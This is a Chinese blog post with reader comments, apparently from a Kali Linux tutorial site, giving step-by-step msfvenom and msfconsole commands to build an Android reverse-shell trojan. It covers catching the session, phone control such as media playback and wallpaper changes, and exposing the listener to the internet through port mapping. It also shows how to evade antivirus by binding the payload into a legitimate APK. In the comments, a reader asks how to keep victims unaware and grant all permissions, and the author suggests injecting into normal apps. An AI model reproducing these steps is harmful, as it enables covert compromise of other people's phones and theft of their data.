普通版
在 kali中我们可以利用 msfvenom来生成一个Android木马。命令如下:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > TPLINK.apk这样便生成了一个名为 TPLINK.apk的Android木马。
然后我们配合 msfcosole进行攻击即可。
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LPORT 5555
exploit手机端安装并执行,成功获得shell。
一些另外的玩法
给手机播放视频和音频文件(需更新到最新版的msf)
命令格式: paly /root/xxx.mp3 mp4
修改手机壁纸
background
use post/multi/manage/set_wallpaper
sessions
set sessions id
set WALLPAPER_FILE JPG
exploit晋级玩法
利用 armitage图形化管理工具
可视化的文件管理
骨灰级
外网木马
我们可以利用花生壳进行端口映射完成外网木马的渗透测试,添加端口如下!
然后在kali中设置花生壳的端口和ip地址即可。
那么!你还有那些另类的玩法呢?一起在下方交流吧。
木马免杀
对于以上的木马,是无法通过杀毒软件的查杀的,我们可以将 payload加入到正常的APP中,来起来免杀的效果。
命令:
msfvenom -p -x test.apk android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > kali.apk命令详解:-x: 后跟原生态app
生成的kali.apk为新的木马文件。
Kali笔记
36 comments
蛙趣,大表哥还有博客,我在B站关注你了!!!
感谢支持!
学习了,大表哥!
这个好用吗?
可以,试试就知道了!
参考视频,看你哪里一步有问题!
普通版的应用程是什么,msfvenom是不是就是普通的终端。
普通的就是只能内网玩,不能免杀!
请问我在手机上运行了木马,可是我的kali终端没有反应,是不是我的电脑有问题还是我的操作问题?
手机和kali不在同一网段造成的!参考文章https://bbskali.cn/forum.php?mod=viewthread&tid=1728&mobile=2
为什么我在手机运行了可是我的kali linux终端没有反应
怎么在kali中设置 花生壳端口映射?
生成木马填写花生壳的IP和端口!配置msf时填写内网的IP和端口!
为啥不行?可以加下你扣吗?
花生壳的ip和端口就是在添加时设置的ip和端口吗?
有iOS的嘛
没有的
手机要填IP吗
不需要!
想问问怎么给apk加后门
,,
大佬你好,有个问题哈,exploit之后,只有第一行,没有第二行Starting the payload handler 提示,这是咋回事啊?网络已桥接,,
我和你是一样的问题,想问下你最后是怎么解决的
你好,生成木马用的IP地址必须为kali的IP。不是手机的IP。同时在msf中填写的IP和端口也要和生成木马时填写的相同!
需要无线网卡吗
不需要,在同一局域网就可以了。
为什么到最后就显示一行?
生成之后我安装了,在手机上点击没有反应是为什么呀??还有就是虚拟机连网用什么模式,桥接还是NAT??再者就是我set LHOST和set LPORT之后用另一个控制台打开show options看到的是没有set之前的配置,为什么呀??求解,谢谢。
你好,msf生成的木马点了之后是没反应的,但是后台可以得到shell
请求回信,上面的问题解决了,好像只能桥接模式,但是我安装上之后没有权限,手动开的,有什么方法能让对方不知道,并且权限都是允许的?VX:dyk15829298797
你好,这是通病,你可以尝试给正常的APP中加入注入脚本!
很基础的教程,感谢博主分享。
超过18M的原生apk无法生成新的apk文件
哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈
msfvenom -p -x test.apk android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > kali.apk实验时一直Invalid Payload Selected
把test.apk换成你自己的apk文件。